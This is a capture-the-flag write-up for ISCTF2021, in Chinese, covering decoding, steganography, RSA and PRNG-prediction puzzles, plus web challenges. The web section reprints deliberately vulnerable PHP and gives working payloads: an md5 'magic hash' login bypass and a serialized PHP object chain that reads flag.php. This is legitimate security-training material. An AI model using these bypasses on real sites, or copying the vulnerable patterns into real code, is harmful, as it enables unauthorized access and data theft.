ISCTF2021

ISCTF2021

MISC

Misc签到

出题人:啊罗小黑战记停更了

学校:焦作大学

帅哥美女,你们考虑过把这串字符串解密一下吗?或许可以考虑下口算md5哦,又或者是base32/64……只要你猜对了,伦家就让你嘿嘿嘿… by:啊罗小黑战记停更了(QQ:1813785342)<–这是出题人快去找他嘿嘿嘿

1
2
3
4
SVNDVEZ7aHVhbl95aW5nX2xhaV9kYW9fQ1RGX2RlX3NoaV9qaWV9

Base64解码
ISCTF{huan_ying_lai_dao_CTF_de_shi_jie}

女神的嘲讽

出题人:f1@g

学校:河南理工大学

题目描述:你向心仪很久的女神告白,她却这样回复你……

格式为flag{.*}

文字全部去掉,Ook编码解码:https://www.splitbrain.org/services/ook

然后Base64解码

1
2
3
┌──(kali㉿kali)-[~/桌面]
└─$ echo ZmxhZ3sxX0kwVmVfeTB1X3Qwb30= | base64 -d
flag{1_I0Ve_y0u_t0o}

我裂开了

听说…给我回复一个 ISCTF 我就能给你flag, 但是我得先让你帮我一个忙,因为,我裂开了啊!!!

直接搜索公众号:蓝鲨信息

1
ISCTF{WelC0me_2_ISCTF_ANd_Have_FuN}

你下载的真的是图片吗?

出题人:Shangu

学校:平顶山学院

题目描述: 你相信光吗?

Shangu在图片里隐藏了“木马病毒”,这次他有没有大败小怪兽呢?

后缀改zip解压再改zip

flag

1
ISCTF{W0w!_Y0u_aRe_So_C1ear!}

Welcome To ISCTF World

出题人:f00001111、xiaobai

学校:大理大学、信阳师范学院

题目描述:欢迎来到ISCTF世界

附件:https://share.weiyun.com/ISvTkLqF

玩游戏找flag

1
2
3
4
flag part 1:ISCTF{e7c70265
flag part 2:-6a76-4617-bc64
flag part 3:-73f5
flag part 4:e3fdce60}

flag

1
ISCTF{e7c70265-6a76-4617-bc64-73f5e3fdce60}

登录流量分析

出题人:李黑子

学校:周口职业技术学院

题目描述:小明的密码忘了,这里有小明之前登录时候截取的流量,请你帮他从中找到登录密码

搜索pass信息,然后追踪HTTP流可发现flag

image-20211031101455045

flag

1
ISCTF{y723rt3132f88v4}

简单图片隐写术

出题人:啊罗小黑战记停更了

学校:焦作大学

题目描述:一种简单的图片隐写术

zsteg直接梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/桌面]
└─$ zsteg 1.png
[!] ZPNG::ScanLine: #1036: no data at pos 0, scanline dropped
[!] ZPNG::ScanLine: #1037: no data at pos 0, scanline dropped
imagedata .. text: "ISCTF{chu_fa_cai_hong_hai}"
b1,rgba,lsb,xy .. text: "UUUUU]UUUUUy"
b2,r,lsb,xy .. text: "UUUUUUUUUUUUUUUUUV"
b2,r,msb,xy .. text: "jUUUUUUUUUUUUUUU"
b2,g,lsb,xy .. text: "UUUUUUUUP"
b2,g,msb,xy .. text: "ZUUUUUUU"
b2,b,lsb,xy .. text: "UUUUUUUU_"
b2,rgba,lsb,xy .. text: ["o" repeated 10 times]
b4,r,lsb,xy .. text: "\"33333DDDDDEfffffgwwwwy"
b4,g,lsb,xy .. text: "\"\"\"\"#3333333DDDDDDfffffffffffgwx"
b4,g,msb,xy .. text: ["w" repeated 10 times]
b4,b,lsb,xy .. text: ["w" repeated 10 times]
b4,b,msb,xy .. text: "UUUUUUUUUUU=3333"

easy_osint

出题人:Xi0a

学校:云南警官学院

题目描述:最近经常在朋友圈刷到,听说这是在一个广场拍的,请问这是在哪?

flag示例:ISCTF{七花广场}

百度识图金碧广场

image-20211031101516698

flag

1
ISCTF{金碧广场}

受伤的二维码和耳朵

查看频谱图,摩斯密码

1
-.-- ----- ..- ..-. .. -. -.. -- .

摩斯密码解码得到:Y0UFINDME

然后拼二维码

image-20211031101532903

扫码得到:ISCTF{U_f0und_The_half

最终flag

1
ISCTF{U_f0und_The_half_Y0U_FIND_ME}

文件?美女?

解压得到flag,010查看发现是逆序的jpg

1
2
3
f = open('flag', 'rb').read()
res = open('flag.jpg', 'wb')
res.write(f[::-1])

foremost分离出带密码的压缩包,字典爆破,弱口令admin123,麻了

1
ISCTF{5ecdfs-avcsefh-dhvldncmd}

你下载的真的是图片吗?-2

Blue通道有异常

image-20211031101548013

另存为txt,需要提取后面值然后另存为zip

image-20211031101616689

删去最后一行

1
2
3
4
5
6
7
ff = open('out1.txt','w')
a=""
with open('zip.txt','r') as f:
lines = f.readlines()
for line in lines:
a=(a+line[-18:]).replace(" ","")
ff.write(a)

得到的结果在010粘贴为16进制文本,另存为zip

flag.txt

1
2
Lorem ipsum dolori sit amet, consecteturs adipiscing celit, sed dot eiusmod tempor incifdidunt ut labore et dolore magna aliquam. Ut enim ad minimf veniam, quisi nostrud exercitation ullamcoo laboris nisis ut aliquip ex eai commodos consequat. Duis caute irure dolor in reprehenderit in voluptate velit oesse cillum dolore eu fugiat nulla pariatur. Excepteur osint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim lid est laborum.
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

两行内容长度不一样,缺少的字母为isctfmfiosiscool

flag:

1
ISCTF{isctfmfiosiscool}

CRYPTO

弯弯曲曲的路

出题人:YYGP

学校:大理大学

题目描述:一只古典的蓝鲨从一条路的尽头上下上下上的走过了弯弯曲曲的小路上,并且经过了5棵树还有5个银行。

1
2
3
4
5
6
7
8
}I_cFTle_FToneCSWnTC5@0{I

根据题目提示五个一组,可分为五组
}I_cF
Tle_F
ToneC
SWnTC
5@0{I

根据flag格式ISCTF,以及题目提示按照顺序读可得到flag

image-20211031101636146

ISCTF{Welc0nne_@To_I5CTF}

预期解:曲路密码脚本解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# write by 2021/8/4
# 曲路密码
import re


def encrypt_bend(string, col, row=10):
ciphertext = ""
temp = []
for i in range(col):
temp.append([])
for index, i in enumerate(string):
temp[index % col].append(i)
re_temp = list(reversed(temp))
for index, i in enumerate(re_temp):
if index % 2 == 0:
i = list(reversed(i))
ciphertext += "".join(i)
return ciphertext


def decrypt_bend(string, col, row=10):
plaintext = ""
length = len(string)
min_row = length // col # 最小的行数
min_num = col - length % col # 最小行数的列数
# 分组
temp = []
index = 0
for i in range(col):
if i < min_num:
temp.append(string[index:index+min_row])
index += min_row
else:
temp.append(string[index:index+min_row+1])
index += min_row + 1
print(temp)
# 改回列顺序
for index, i in enumerate(temp):
if index % 2 == 0:
# print(re.findall(".{1}", temp[index]))
temp[index] = "".join(list(reversed(re.findall(".{1}", temp[index]))))
temp.reverse()
for i in range(length):
plaintext += temp[i % col][i // col]
return plaintext


if __name__ == '__main__':
col_ = 7
row_ = 5
# ciphertext_ = encrypt_bend("i will beat you this day", col_, row_)
ciphertext_ ='}I_cFTle_FToneCSWnTC5@0{I'
plaintext_ = decrypt_bend(ciphertext_, col_, row_)
print(f"{plaintext_} : {ciphertext_}")



['}I_', 'cFT', 'le_', 'FTon', 'eCSW', 'nTC5', '@0{I']
InWF_c_{TSTeFI0CColT}@5en : }I_cFTle_FToneCSWnTC5@0{I

EasyRSA

yafu分解n得到p、q、r

1
2
3
4
5
6
7
8
9
10
***factors found***

P10 = 2514358789

P10 = 2930880917

P155 = 10728308687033142242263042720863820844383961098139391476856378846439202568058060175330323889963293720874263174254928466703829537388987357384056877938482683


ans = 1

简单题直接梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from Crypto.Util.number import *
import gmpy2

n= 79059977083433369161977159472257563109008119475755288439774758824887836857424336032518651862088590700241980200158542855762122262156445632897757444422514158062996501037323379
e= 65537
c= 31573591986915001857640263466939164206307247748465148395978810720215094970707002043721991055789084518831540652652824225863275289979959264564070907438540016782921324316795681

p= 2514358789
q = 2930880917
r = 10728308687033142242263042720863820844383961098139391476856378846439202568058060175330323889963293720874263174254928466703829537388987357384056877938482683

phi_n=(p-1)*(q-1)*(r-1)
d=gmpy2.invert(e,phi_n)
m=pow(c,d,n)

print(long_to_bytes(m))


flag:ISCTF{Welcome_To_RSA_puzzles}

MediumRSA

1
2
3
4
p= 135406272915839663948982508259168339196413423033707377351582717408135201161291947411690398070725136534418000750068523816458786100037135542069749803825803176245899663700018918204457909082934286787984577920819722071614325832117549949176386055577917668392717683643933279741971553133044965672217515958006018425207
q= 141499967777554698157827398588073190546048161142442371043319091793202159392937117317909316830021492737369017974252412948824878182004132437165872836769442232191985031274210566004860441962404283572352416239402475111512429494403506484997417885317393735452834730615296387016523054424102807140640940320044291046001
e= 894
c= 285599740642531890154220175592437844999990780403815630307661459001713176317615138628516144325413153232796819897801881107425865913054728954677352027457699314702416360013205027660502210085125607181176890689285963882325311472422689397465349673391413548284592577544566069076266866047930427530566329183924506279416975701558074448835820462125272973167295304050434568652119366359340574659484793805164709585039574539722702352716480226900050322661650017379886614397585534285036799547237613356555628012895080401615470840003601931382810917605930301582006344272146554650976008053460139711071700513559719126632374724028665834623

典型的e与phi不互素的情况,属于e与phi有公因数,且不属于公因数是e本身的情况。

BUU有一道原题,改一下脚本直接梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import gmpy2
from Crypto.Util.number import *


# 当e约去公约数后与phi互素
def decrypt(p, q, e, c):
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)
d = gmpy2.invert(e // t, phi)
m = pow(c, d, n)
#print(m)
msg = gmpy2.iroot(m, t)
print(msg)
if msg[1]:
print(long_to_bytes(msg[0]))

p= 135406272915839663948982508259168339196413423033707377351582717408135201161291947411690398070725136534418000750068523816458786100037135542069749803825803176245899663700018918204457909082934286787984577920819722071614325832117549949176386055577917668392717683643933279741971553133044965672217515958006018425207
q= 141499967777554698157827398588073190546048161142442371043319091793202159392937117317909316830021492737369017974252412948824878182004132437165872836769442232191985031274210566004860441962404283572352416239402475111512429494403506484997417885317393735452834730615296387016523054424102807140640940320044291046001
e= 894
c= 285599740642531890154220175592437844999990780403815630307661459001713176317615138628516144325413153232796819897801881107425865913054728954677352027457699314702416360013205027660502210085125607181176890689285963882325311472422689397465349673391413548284592577544566069076266866047930427530566329183924506279416975701558074448835820462125272973167295304050434568652119366359340574659484793805164709585039574539722702352716480226900050322661650017379886614397585534285036799547237613356555628012895080401615470840003601931382810917605930301582006344272146554650976008053460139711071700513559719126632374724028665834623

decrypt(p, q, e, c)


b'ISCTF{RSA_Is_Fun233}'

脚本2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import gmpy2
from Crypto.Util.number import *
p= 135406272915839663948982508259168339196413423033707377351582717408135201161291947411690398070725136534418000750068523816458786100037135542069749803825803176245899663700018918204457909082934286787984577920819722071614325832117549949176386055577917668392717683643933279741971553133044965672217515958006018425207
q= 141499967777554698157827398588073190546048161142442371043319091793202159392937117317909316830021492737369017974252412948824878182004132437165872836769442232191985031274210566004860441962404283572352416239402475111512429494403506484997417885317393735452834730615296387016523054424102807140640940320044291046001
n = p * q
e= 894
c= 285599740642531890154220175592437844999990780403815630307661459001713176317615138628516144325413153232796819897801881107425865913054728954677352027457699314702416360013205027660502210085125607181176890689285963882325311472422689397465349673391413548284592577544566069076266866047930427530566329183924506279416975701558074448835820462125272973167295304050434568652119366359340574659484793805164709585039574539722702352716480226900050322661650017379886614397585534285036799547237613356555628012895080401615470840003601931382810917605930301582006344272146554650976008053460139711071700513559719126632374724028665834623
phi = (p-1)*(q-1)
a = gmpy2.gcd(e,phi)
#print(a)
e = e//a
d = gmpy2.invert(e,phi)
m6 = gmpy2.powmod(c,d,n)
print(long_to_bytes(gmpy2.iroot(m6,6)[0]))


b'ISCTF{RSA_Is_Fun233}'

HardRSA1*

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from Crypto.Util.number import *
flag=b'****************************'
m1 = bytes_to_long(flag)
N = getPrime(512)*getPrime(512)
e = 19

c1 = pow(m1, e, N)

a = getRandomNBitInteger(512)
b = getRandomNBitInteger(512)
m2 = a*m1 + b
c2 = pow(m2, e, N)

print(N, a, b, c1, c2, sep="\n")
# N=95587878777633457712771077861034164878218007211732872086703082427025284038734073722525350247252021434969755949232136071401015995927195956787389015816040788670336377590142763231354554070366181264021083507258416574251611662836423194484700341105611819435848709315571900313318932989155213069438624597581376096919
# a=8148274285376731469630646414567940438407613039123927029192149790588715641540606813881834241911738725252707074817442402177237967817804420371483845842902231
# b=9944999010165189354017274928734887652060645960820869672700674403006764312275448509638591901570545531313058741811202384719307206506483462331704719044400878
# c1=1870704366656953386352816295794415188411021228249016204037205250475471490295719163599101603443054766225481004510415813930027376456511655528372027273843117886139717834189065273068836018423957958033253086582500645476025731783186122169863569195566258360470326607481719859396822157309140555156145108464948303484
# c2=73255380295741602810215998117368212335852087176390783730568276178375345944401489472119142216343959193098593837507600341773896221941166940563956033779653381698066185496693623741658031273011213568043342267706206340976896722388323992521780876436269830484416265647861652562217726795508745205674083028929318260061

HardRSA2

1
2
3
4
5
6
7
8
9
10
11
12
from Crypto.Util.number import *
flag = b'*****************************************'
p=getPrime(256)
q=getPrime(256)
n=p*q
e=3
c1=pow(bytes_to_long(flag),e,n)
c2=pow(bytes_to_long(flag)+1,e,n)
print("n=",n)
print("e=",e)
print("c1=",c1)
print("c2=",c2)

已知n,e=3,m对应的密文c1,(m+1)对应的密文c2。
直接硬化公式去解,脚本写着也方便:

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import gmpy2
from Crypto.Util.number import *
def getM2(a,b,c1,c2,n):
a3 = pow(a,3,n)
b3 = pow(b,3,n)
first = c1-a3*c2+2*b3
first = first % n
second = 3*b*(a3*c2-b3)
second = second % n
third = second*gmpy2.invert(first,n)
third = third % n
fourth = (third+b)*gmpy2.invert(a,n)
return fourth % n
a = 1
b = -1
c1 = 2472980534576281392558886476940549411151541741395435035178216067058424274579199860482131340986643214114691172763529231832373323600612645856564185998644266
c2 =3187049937811823373965320946136219840500070255491222077303817795527750241053576957767965313420456458983759851110615696314773380132732017115202532855996999
n = 4204420773617479943564859167286821133009223627804172573263590117785622718525161236597233398439402100826272190957218464786259692632804955516979471884796171
m = a*getM2(a,b,c1,c2,n) + b
print(m)
flag = long_to_bytes(m)
print(flag)



2627677351174352521228982698389418302338831226796241650558277555097107627042754252273675470990465824942973
b'ISCTF{U_n0w_kn0w_Related_information_attack}'

Circular Game

维吉尼亚密码,解出来是yunnanuniversity,作为kz.zip的密码打开压缩包

cipher.txt

1
2
└─$ cat cipher.txt    
Vt9T2BKcJR647T6jmomlLEt0WEDBXVfrk0/oSXLtOTRpZgKyyMo9jKbBByR3L5zuiqh31FbJ7Yb41D1VSU2y7biQNnaByDPj5FHr96hxEEupxRXPTgyoKUb1QCLU1YbpJvzUHPELPsBwyMnLBQxDCrid1mkJ4nP+ZcoI8UzXGlNGTJgYjOV1txv9/9UKsfvtdhrSuogyQ7dY/935bB/B6+3mWFX/XpN68O6vRJqwoY66fBQv+cp2xMY43hzs/7q+R10O3wz98s7BNQjgV4isGVWfp5yAgu2/DAj1Ww13zTthqCJ6XFrC4Jz+RiiLsqpxiB6HzOsd7YzJ3cWDHH1leA==

public_key.pem

1
2
3
4
5
6
7
8
9
10
└─$ cat public_key.pem
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq+m7iHurBa9G8ujEiTpZ
71aHOVNhQXpd6jCQNhwMN3hD6JHkv0HSxmJwfGe0EnXDtjRraWmS6OYzT4+LSrXs
z9IkWGzRlJ4lC7WHS8D3NWIWYHCP4TRt2N0TlWXWm9nFCrEXqQ3IWgYQpQvKzsds
etnIZJL1tf1wQzGE6rbkbvURlUBbzBSuidkmi0kY5Qxp2Jfb6OUI647zx2dPxJpD
ffSCNffVIDUYOvrgYxIhs5HmCF3XECC3VfaKtRceL5JM8R0qz5nVU2Ns8hPvSVP+
7/i7G447cjW151si0joB7RpBplu44Vk8TXXDAk0JZdW6KwJn7ITaX04AAAAAAAAA
AQIDAQAB
-----END PUBLIC KEY-----

攻防世界-Handicraft_RSA改编

提取公钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~/桌面/kz]
└─$ openssl rsa -pubin -text -modulus -in warmup -in public_key.pem
RSA Public-Key: (2048 bit)
Modulus:
00:ab:e9:bb:88:7b:ab:05:af:46:f2:e8:c4:89:3a:
59:ef:56:87:39:53:61:41:7a:5d:ea:30:90:36:1c:
0c:37:78:43:e8:91:e4:bf:41:d2:c6:62:70:7c:67:
b4:12:75:c3:b6:34:6b:69:69:92:e8:e6:33:4f:8f:
8b:4a:b5:ec:cf:d2:24:58:6c:d1:94:9e:25:0b:b5:
87:4b:c0:f7:35:62:16:60:70:8f:e1:34:6d:d8:dd:
13:95:65:d6:9b:d9:c5:0a:b1:17:a9:0d:c8:5a:06:
10:a5:0b:ca:ce:c7:6c:7a:d9:c8:64:92:f5:b5:fd:
70:43:31:84:ea:b6:e4:6e:f5:11:95:40:5b:cc:14:
ae:89:d9:26:8b:49:18:e5:0c:69:d8:97:db:e8:e5:
08:eb:8e:f3:c7:67:4f:c4:9a:43:7d:f4:82:35:f7:
d5:20:35:18:3a:fa:e0:63:12:21:b3:91:e6:08:5d:
d7:10:20:b7:55:f6:8a:b5:17:1e:2f:92:4c:f1:1d:
2a:cf:99:d5:53:63:6c:f2:13:ef:49:53:fe:ef:f8:
bb:1b:8e:3b:72:35:b5:e7:5b:22:d2:3a:01:ed:1a:
41:a6:5b:b8:e1:59:3c:4d:75:c3:02:4d:09:65:d5:
ba:2b:02:67:ec:84:da:5f:4e:00:00:00:00:00:00:
00:01
Exponent: 65537 (0x10001)
Modulus=ABE9BB887BAB05AF46F2E8C4893A59EF5687395361417A5DEA3090361C0C377843E891E4BF41D2C662707C67B41275C3B6346B696992E8E6334F8F8B4AB5ECCFD224586CD1949E250BB5874BC0F735621660708FE1346DD8DD139565D69BD9C50AB117A90DC85A0610A50BCACEC76C7AD9C86492F5B5FD70433184EAB6E46EF51195405BCC14AE89D9268B4918E50C69D897DBE8E508EB8EF3C7674FC49A437DF48235F7D52035183AFAE0631221B391E6085DD71020B755F68AB5171E2F924CF11D2ACF99D553636CF213EF4953FEEFF8BB1B8E3B7235B5E75B22D23A01ED1A41A65BB8E1593C4D75C3024D0965D5BA2B0267EC84DA5F4E0000000000000001
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq+m7iHurBa9G8ujEiTpZ
71aHOVNhQXpd6jCQNhwMN3hD6JHkv0HSxmJwfGe0EnXDtjRraWmS6OYzT4+LSrXs
z9IkWGzRlJ4lC7WHS8D3NWIWYHCP4TRt2N0TlWXWm9nFCrEXqQ3IWgYQpQvKzsds
etnIZJL1tf1wQzGE6rbkbvURlUBbzBSuidkmi0kY5Qxp2Jfb6OUI647zx2dPxJpD
ffSCNffVIDUYOvrgYxIhs5HmCF3XECC3VfaKtRceL5JM8R0qz5nVU2Ns8hPvSVP+
7/i7G447cjW151si0joB7RpBplu44Vk8TXXDAk0JZdW6KwJn7ITaX04AAAAAAAAA
AQIDAQAB
-----END PUBLIC KEY-----

Modulus的值转换为十进制就是n,然后分解n得到p和q

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
import gmpy2
import base64

#pub = RSA.importKey(open('public_key.pem').read())
#n = pub.n
#e = pub.e

e=65537
n=21702007965967851183912845012669844623756908507890324243024055496763943595946688940552416734878197459043831494232875785620294668737665396025897150541283087580428261036967329585399916163401369611036124501098728512558174430431806459204349427025717455575024289926516646738721697827263582054632714414433009171634156535642801472435174298248730890036345522414464312932752899972440365978028349224554681969090140541620264972373596402565696085035645624229615500129915303416150964709569033763686335344334340374467597281565279826664494938820964323794098815428802817709142950181265208976166531957235913949338642042322944000000001
p = 139457081371053313087662621808811891689477698775602541222732432884929677435971504758581219546068100871560676389156360422970589688848020499752936702307974617390996217688749392344211044595211963580524376876607487048719085184308509979502505202804812382023512342185380439620200563119485952705668730322944000000001
q = 155617827023249833340719354421664777126919280716316528121008762838820577123085292134385394346751341309377546683859340593439660968379640585296350265350950535158375685103003837903550191128377455111656903429282868722284520586387794090131818535032744071918282383650099890243578253423157468632973312000000000000001

d = gmpy2.invert(e,(p-1)*(q-1))

msg = base64.b64decode("Vt9T2BKcJR647T6jmomlLEt0WEDBXVfrk0/oSXLtOTRpZgKyyMo9jKbBByR3L5zuiqh31FbJ7Yb41D1VSU2y7biQNnaByDPj5FHr96hxEEupxRXPTgyoKUb1QCLU1YbpJvzUHPELPsBwyMnLBQxDCrid1mkJ4nP+ZcoI8UzXGlNGTJgYjOV1txv9/9UKsfvtdhrSuogyQ7dY/935bB/B6+3mWFX/XpN68O6vRJqwoY66fBQv+cp2xMY43hzs/7q+R10O3wz98s7BNQjgV4isGVWfp5yAgu2/DAj1Ww13zTthqCJ6XFrC4Jz+RiiLsqpxiB6HzOsd7YzJ3cWDHH1leA==")
key = RSA.construct((int(n),int(e),int(d),int(p),int(q)))
'''for i in range(20):
enc = key.decrypt(msg)
msg = enc
print(msg)
'''
msg = bytes_to_long(msg)
for i in range(100):
enc = pow(msg,d,n)
msg = enc
if b"ISCTF" in long_to_bytes(msg):
print(long_to_bytes(msg))



b'ISCTF{Cyc1ic_encrypt10n_4_y0u}'

Do_u_know_coding

学校:福建师范大学

题目提示:

Base64 variation

5 levels in total

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
494n4n56453244524n464544475353534q4n5747343644524n5n4q5647544o32495634544o57434n4r563256455253484s464n584153434s47464r46455n3353494q59584o5n4o4r4o424r4755333253494646454q5344594r453q3q3q3q3q3q

ROT13:
494a4a56453244524a464544475353534d4a5747343644524a5a4d5647544b32495634544b57434a4e563256455253484f464a584153434f47464e46455a3353494d59584b5a4b4e4b424e4755333253494646454d5344594e453d3d3d3d3d3d

hex:
IJJVE2DRJFEDGSSSMJWG46DRJZMVGTK2IV4TKWCJNV2VERSHOFJXASCOGFNFEZ3SIMYXKZKNKBNGU32SIFFEMSDYNE======

Base32:
BSRhqIH3JRblnxqNYSMZEy5XImuRFGqSpHN1ZRgrC1ueMPZjoRAJFHxi

凯撒13
OFEudVU3WEoyakdALFZMRl5KVzhESTdFcUA1MEteP1hrZCMwbENWSUkv

Base64:
8Q.uU7XJ2jG@,VLF^JW8DI7Eq@50K^?Xkd#0lCVII/

ASCII85解码:
ISCTF{W0w_y0u_c4n_rea11y_c0d1ng!}

RdEs

出题人:YYGP

学校:大理大学

题目描述:前624都是不同的蓝鲨,你能知道第625个蓝鲨是什么吗?

看见生成624个随机数就简单了,mt19937随机数预测。
需要前624位进行预测,刚好在output.txt里面,直接套用脚本,跑一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from random import Random

o = 9999999999999999999999999999999999999999999999999999999999999
# right shift inverse
def inverse_right(res, shift):
tmp = res
bits=len(bin(res)[2:])
for i in range(bits // shift):
tmp = res ^ tmp >> shift
return tmp

# right shift with mask inverse
def inverse_right_mask(res, shift, mask):
tmp = res
bits=len(bin(res)[2:])
for i in range(bits // shift):
tmp = res ^ tmp >> shift & mask
return tmp

# left shift inverse
def inverse_left(res, shift):
tmp = res
bits=len(bin(res)[2:])
for i in range(bits // shift):
tmp = res ^ tmp << shift
return tmp

# left shift with mask inverse
def inverse_left_mask(res, shift, mask):
tmp = res
bits=len(bin(res)[2:])
for i in range(bits // shift):
tmp = res ^ tmp << shift & mask
return tmp

def recover(y):
y = inverse_right(y,18)
y = inverse_left_mask(y,15,4022730752)
y = inverse_left_mask(y,7,2636928640)
y = inverse_right(y,11)
return y

def clone_mt(record):
state = [recover(i) for i in record]
gen = Random()
gen.setstate((3,tuple(state+[0]),None))
return gen

f = open(r"预测.txt",'r').readlines()
prng = []
for i in f:
prng.append(int(i.strip("\n")))

g = clone_mt(prng[:624])
for i in range(700):
g.getrandbits(32)

key = g.getrandbits(32)
print(key)
#预测结果:3763948799

跑出来就是这道题的 key
然后继续看剩下的 aes加密

脚本解密,直接得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import base64
from Crypto.Cipher import AES


def add_to_32(value):
while len(value) % 32 != 0:
value += '\0'
return str.encode(value) # 返回bytes


def add_to_16(value):
while len(value) % 16 != 0:
value += '\0'
return str.encode(value) # 返回bytes


def decrypt_oralce(text):
# 秘钥
key = '3763948799'
# 密文
# 初始化加密器
aes = AES.new(add_to_16(key), AES.MODE_ECB)
# 优先逆向解密base64成bytes
base64_decrypted = base64.decodebytes(text.encode(encoding='utf-8'))
# 执行解密密并转码返回str
decrypted_text = str(aes.decrypt(base64_decrypted), encoding='utf-8').replace('\0', '')
print('decrypted_text', decrypted_text)
return decrypted_text


if __name__ == '__main__':
text = '''{'aaa': '111', 'bbb': '222'}'''

decrypt_oralce("BYIlzaPnImGZeWVpn+QudBiZEwlaA3H3rl69STD8/tQ=")

flag:

1
ISCTF{AE5_AnD_ranD0m}

鲨米尔*

500

出题人:YYGP

学校:大理大学

题目描述:鲨米尔有5道门,好像我只需要知道3道就能进去了

WEB

Web签到

出题人:0000FF

学校:大理大学

题目描述:js

http://isctf.mcsog.tk:10004/

Ctrl+U查看源码

1
2
3
4
<!-- ISCTF{mf_woDichaoRen!} -->

新flag:
<!-- ISCTF{885b0389-3d86-4c8b-8e95-846829ed6918} -->

粗心的小蓝鲨

出题人:f1@g

学校:河南理工大学

题目描述:粗心小蓝鲨忘记了他的账号密码,你能帮帮他吗?

http://isctf.mcsog.tk:10000/

admin/123456登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
error_reporting(0);
if (isset($_POST['username']) && isset($_POST['password'])) {
$name=$_POST["username"];
$pwd=$_POST["password"];
$logined = true;
$flag = 'XXXX';
include("flag.php");

if (!ctype_alpha($name)) {$logined = false;}
if (!is_numeric($pwd) ) {$logined = false;}
if (md5($name) != md5($pwd)) {$logined = false;}

if ($logined){
echo "<h1>"."login successful"."<p>".$flag;
}else{
echo "<h1>"."Login failed"."<p>"."The blue shark mocked you and threw a hint at you"."<p>";
highlight_file(__FILE__);
}
}
?>

md5碰撞绕过

1
2
3
4
5
6
7
POST: username=QNKCDZO&password=240610708


ISCTF{pHP_1s_ThE_6eST_1@n9V@Ge}

新flag:
ISCTF{acde1b6f-085d-4c5d-91f3-07ce8ff4ee95}

小蜘蛛

出题人:啊罗小黑战记停更了

学校:焦作大学

题目描述:友仔友女们,你们喜欢小蜘蛛吗? http://isctf.mcsog.tk:10002/

1
2
3
4
5
6
7
/robot.txt
/flag_is_here.php
ISCTF{g9kov44avqh5kjkes8d990t1y}


新flag:
ISCTF{ba2f7fa0-0727-4739-b883-ac609a0e5258}

pop_unserialize

出题人:种花家

学校:乐山职业技术学院

http://isctf.mcsog.tk:10003/unserialize.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
//flag.php
//MF师傅告诉我file_get_contents这个函数能输出flag.php里面的内容

class MF_is_cat{
private $pop = "f00001111";
public $MF = "miao~ miao~ miao~";
function __construct(){
$this->pop =new ISCTF();
}

function __destruct(){
$this->pop->action();
}
}

class ISCTF{
function action(){
echo "Welcome to ISCTF World!";
}
}

class Show{
var $test2;
function action(){
echo file_get_contents($this->test2);
}
}


if(isset($_POST['ISCTF'])){
unserialize($_POST['ISCTF']);
}else{
$obj = new MF_is_cat();
highlight_file(__FILE__);
}
?> Welcome to ISCTF World!

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
//flag.php
//MF师傅告诉我file_get_contents这个函数能输出flag.php里面的内容

class MF_is_cat{
public $pop = "f00001111";
public $MF = "miao~ miao~ miao~";
function __construct(){
$this->pop =new Show();
}

function __destruct(){
$this->pop->action();
}
}

class ISCTF{
function action(){
echo "Welcome to ISCTF World!";
}
}

class Show{
var $test2='flag.php';
function action(){
echo file_get_contents($this->test2);
}
}


$m=new MF_is_cat();

$a= serialize($m);
echo $a;
?>


POST:
ISCTF=O:9:"MF_is_cat":2:{s:3:"pop";O:4:"Show":1:{s:5:"test2";s:8:"flag.php";}s:2:"MF";s:17:"miao~ miao~ miao~";}
O:9:"MF_is_cat":2:{s:3:"pop";O:4:"Show":1:{s:5:"test2";s:2:"la";}s:2:"MF";s:17:"miao~ miao~ miao~";}


ISCTF{MF_YYDS}

新flag:
ISCTF{ea2b37f4-ec87-4587-b11d-e55987dcb325}

预期解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
